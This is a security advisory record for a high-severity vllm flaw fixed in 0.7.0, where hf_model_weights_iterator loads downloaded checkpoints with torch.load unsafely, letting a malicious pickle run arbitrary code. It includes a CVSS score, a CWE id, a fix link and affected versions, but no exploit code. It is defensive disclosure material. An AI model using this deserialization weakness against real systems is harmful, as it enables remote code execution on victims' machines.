GHSA-rh4j-5rhw-hr54

Suggest an improvement
Source
https://github.com/advisories/GHSA-rh4j-5rhw-hr54
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/01/GHSA-rh4j-5rhw-hr54/GHSA-rh4j-5rhw-hr54.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-rh4j-5rhw-hr54
Aliases
Published
2025-01-27T20:50:30Z
Modified
2025-06-30T13:10:11.856498Z
Severity
  • 7.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H CVSS Calculator
Summary
vllm: Malicious model to RCE by torch.load in hf_model_weights_iterator
Details

Description

The vllm/modelexecutor/weightutils.py implements hfmodelweightsiterator to load the model checkpoint, which is downloaded from huggingface. It use torch.load function and weightsonly parameter is default value False. There is a security warning on https://pytorch.org/docs/stable/generated/torch.load.html, when torch.load load a malicious pickle data it will execute arbitrary code during unpickling.

Impact

This vulnerability can be exploited to execute arbitrary codes and OS commands in the victim machine who fetch the pretrained repo remotely.

Note that most models now use the safetensors format, which is not vulnerable to this issue.

References

  • https://pytorch.org/docs/stable/generated/torch.load.html
  • Fix: https://github.com/vllm-project/vllm/pull/12366
Database specific
{
    "severity": "HIGH",
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-502"
    ],
    "nvd_published_at": "2025-01-27T18:15:41Z",
    "github_reviewed_at": "2025-01-27T20:50:30Z"
}
References

Affected packages

PyPI / vllm

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
0.7.0

Affected versions

0.*

0.0.1
0.1.0
0.1.1
0.1.2
0.1.3
0.1.4
0.1.5
0.1.6
0.1.7
0.2.0
0.2.1
0.2.1.post1
0.2.2
0.2.3
0.2.4
0.2.5
0.2.6
0.2.7
0.3.0
0.3.1
0.3.2
0.3.3
0.4.0
0.4.0.post1
0.4.1
0.4.2
0.4.3
0.5.0
0.5.0.post1
0.5.1
0.5.2
0.5.3
0.5.3.post1
0.5.4
0.5.5
0.6.0
0.6.1
0.6.1.post1
0.6.1.post2
0.6.2
0.6.3
0.6.3.post1
0.6.4
0.6.4.post1
0.6.5
0.6.6
0.6.6.post1